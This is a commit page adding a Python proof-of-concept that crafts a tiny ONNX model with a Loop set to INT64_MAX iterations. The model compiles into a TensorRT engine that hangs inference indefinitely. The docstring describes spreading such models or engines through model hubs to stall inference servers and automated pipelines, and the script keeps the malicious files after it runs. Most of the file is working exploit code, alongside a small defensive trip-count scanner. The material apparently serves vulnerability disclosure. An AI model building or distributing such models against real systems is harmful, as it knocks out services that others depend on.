treforbenbow committed · verified
Commit 2fc3065 · 1 Parent(s): 13648ce

Upload vuln003_loop_dos.py with huggingface_hub

Files changed (1):
1. vuln003_loop_dos.py  +230 -0

vuln003_loop_dos.py  ADDED
@@ -0,0 +1,230 @@
"""
VULN-003 PoC: TensorRT Denial of Service via ONNX Loop with INT64_MAX Iterations

A crafted ONNX model (338 bytes) containing a Loop operator with max_trip_count
set to INT64_MAX (9,223,372,036,854,775,807) compiles into a valid TensorRT
engine (20,252 bytes) that hangs indefinitely during inference.

Attack vectors:
1. ONNX model on a model hub -> victim compiles it to an engine -> inference hangs
2. Pre-compiled engine file on a model hub -> victim loads it -> inference hangs
3. Automated ML pipeline ingests the malicious model -> entire pipeline stalls

Impact:
- Permanent denial of service for TensorRT inference servers
- No timeout mechanism in execute_async_v3(); it hangs until the process is killed
- Tiny file size (338-byte ONNX model / 20 KB engine) makes distribution trivial
- Affects Triton Inference Server, TensorRT-LLM, and any TRT-based pipeline
"""
import os
import sys
import time
import subprocess
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

POC_DIR = os.path.dirname(os.path.abspath(__file__))
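

# Background, per the ONNX spec: Loop takes a maximum trip count M, an initial
# condition, and loop-carried inputs, and iterates until M trips have run or
# the body's condition output goes false. The body built below passes the
# always-true condition through unchanged, so termination rests entirely on
# M, which here is set to INT64_MAX = 2**63 - 1.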
def create_loop_dos_model(trip_count=0x7FFFFFFFFFFFFFFF):
    """Create a minimal ONNX model whose Loop runs for trip_count iterations
    (INT64_MAX by default)."""
    # Loop body: Relu (trivial computation); the Identity node carries the
    # loop condition through unchanged
    body_input = helper.make_tensor_value_info('i', TensorProto.INT64, [])
    body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, [])
    body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4])
    body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, [])
    body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4])

    relu = helper.make_node('Relu', ['x_in'], ['x_out'])
    identity_cond = helper.make_node('Identity', ['cond_in'], ['cond_out'])
    body = helper.make_graph(
        [relu, identity_cond], 'loop_body',
        [body_input, body_cond_in, body_x_in],
        [body_cond_out, body_x_out]
    )

    # Main graph
    X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4])
    Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4])

    # Default trip count: INT64_MAX = 9,223,372,036,854,775,807
    max_trip = numpy_helper.from_array(
        np.array(trip_count, dtype=np.int64), 'max_trip'
    )
    cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')

    loop = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'input'], ['output'],
        body=body
    )

    graph = helper.make_graph([loop], 'loop_dos', [X], [Y], [max_trip, cond_init])
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    model.ir_version = 7
    return model


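# Defensive sketch: a minimal pre-load check a pipeline could run before
# compiling untrusted ONNX. It reads initializer-backed Loop trip counts from
# the top-level graph and flags absurd values. The function name and threshold
# are illustrative assumptions, not an established API; the PoC does not call it.
# e.g. scan_loop_trip_counts(onnx.load("dos_loop.onnx")) flags the INT64_MAX loop.
def scan_loop_trip_counts(model, max_sane_trips=10**7):
    """Return (node_name, trip_count) pairs whose trip count exceeds the bound."""
    inits = {init.name: init for init in model.graph.initializer}
    flagged = []
    for node in model.graph.node:
        # Loop input 0 is the optional max-trip-count tensor M
        if node.op_type == 'Loop' and node.input and node.input[0] in inits:
            trips = int(numpy_helper.to_array(inits[node.input[0]]))
            if trips > max_sane_trips:
                flagged.append((node.name, trips))
    return flagged

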
def build_engine(model_path, engine_path):
    """Build a TensorRT engine from an ONNX model."""
    import tensorrt as trt

    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    parser = trt.OnnxParser(network, logger)

    if not parser.parse_from_file(model_path):
        for i in range(parser.num_errors):
            print(f"    Parse error: {parser.get_error(i)}")
        return False

    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)  # 16 MiB

    serialized = builder.build_serialized_network(network, config)
    if not serialized:
        print("    Build failed")
        return False

    with open(engine_path, 'wb') as f:
        f.write(bytes(serialized))
    return True


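# The hung call cannot be recovered in-process: execute_async_v3() exposes no
# timeout, so inference runs in a child process and subprocess.run(timeout=...)
# is the kill switch that makes the hang measurable.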
def test_inference_subprocess(engine_path, timeout=30):
    """Run inference in a subprocess; return (hung, elapsed, stdout, returncode)."""
    script = f'''
import tensorrt as trt, numpy as np, torch, time, sys

with open(r"{engine_path}", "rb") as f:
    data = f.read()

logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(data)
if not engine:
    print("DESER_FAIL")
    sys.exit(1)

context = engine.create_execution_context()
device = torch.device("cuda:0")
inp = torch.randn(1, 4, device=device)
out = torch.empty(1, 4, device=device)
context.set_tensor_address("input", inp.data_ptr())
context.set_tensor_address("output", out.data_ptr())

stream = torch.cuda.current_stream()
print("INFERENCE_STARTED")
sys.stdout.flush()
start = time.time()
context.execute_async_v3(stream.cuda_stream)
stream.synchronize()
elapsed = time.time() - start
print(f"INFERENCE_DONE time={{elapsed:.1f}}s")
'''
    start = time.time()
    try:
        r = subprocess.run(
            [sys.executable, "-c", script],
            capture_output=True, text=True, timeout=timeout
        )
        elapsed = time.time() - start
        return False, elapsed, r.stdout.strip(), r.returncode
    except subprocess.TimeoutExpired:
        elapsed = time.time() - start
        return True, elapsed, "TIMEOUT", -1


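# Expected output (assuming a CUDA GPU with TensorRT and torch installed):
# the baseline in step [3] finishes almost immediately, while step [4] prints
# INFERENCE_STARTED and then nothing until the 30-second timeout kills it.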
def main():
    print("=" * 70)
    print("VULN-003: TensorRT Inference DoS via ONNX Loop(INT64_MAX)")
    print("=" * 70)

    # Step 1: Create malicious ONNX model
    model = create_loop_dos_model()
    onnx_path = os.path.join(POC_DIR, "dos_loop.onnx")
    with open(onnx_path, 'wb') as f:
        f.write(model.SerializeToString())

    onnx_size = os.path.getsize(onnx_path)
    print(f"\n[1] Malicious ONNX model: {onnx_path}")
    print(f"    Size: {onnx_size} bytes")
    print(f"    Loop max_trip_count: {0x7FFFFFFFFFFFFFFF:,} (INT64_MAX)")
    print("    Loop body: single Relu operation")

    # Step 2: Build TensorRT engine
    engine_path = os.path.join(POC_DIR, "dos_loop.engine")
    print("\n[2] Building TensorRT engine...")
    if not build_engine(onnx_path, engine_path):
        print("    ERROR: Engine build failed")
        sys.exit(1)

    engine_size = os.path.getsize(engine_path)
    print(f"    Engine: {engine_path}")
    print(f"    Size: {engine_size} bytes")
    print("    Build completed normally: no error, no warning")

    # Step 3: Baseline with the same graph but a finite, 10-iteration loop
    print("\n[3] Baseline: Normal model inference")
    baseline_onnx = os.path.join(POC_DIR, "normal_loop.onnx")
    normal_model = create_loop_dos_model(trip_count=10)
    with open(baseline_onnx, 'wb') as f:
        f.write(normal_model.SerializeToString())

    baseline_engine = os.path.join(POC_DIR, "normal_loop.engine")
    build_engine(baseline_onnx, baseline_engine)

    hung, elapsed, out, rc = test_inference_subprocess(baseline_engine, timeout=15)
    print(f"    Normal model (10 iterations): {out} ({elapsed:.1f}s)")

    # Step 4: DoS inference
    print("\n[4] DoS inference (will hang for 30 seconds, then be killed)")
    hung, elapsed, out, rc = test_inference_subprocess(engine_path, timeout=30)
    if hung:
        print(f"    TIMEOUT after {elapsed:.1f}s: INFERENCE IS HANGING")
        print("    [!!!] DoS CONFIRMED")
    else:
        print(f"    Inference completed: {out} ({elapsed:.1f}s)")

    # Summary
    print(f"\n{'='*70}")
    print("VULNERABILITY SUMMARY")
    print(f"{'='*70}")
    print("[!!!] TensorRT inference hangs indefinitely on Loop(INT64_MAX)")
    print(f"[!!!] ONNX model size: {onnx_size} bytes")
    print(f"[!!!] Engine file size: {engine_size} bytes")
    print("[!!!] Both formats can be used as DoS weapons")
    print("[!!!] No timeout in execute_async_v3(): runs until the process is killed")
    print("[!!!] Loop iterations: 9,223,372,036,854,775,807 (INT64_MAX)")
    print("[!!!] Even at 1 billion iterations/sec, the loop would take 292 YEARS")

    # Cleanup temp files (the DoS artifacts dos_loop.onnx/.engine are kept)
    for f in [baseline_onnx, baseline_engine]:
        if os.path.exists(f):
            os.remove(f)


if __name__ == "__main__":
    main()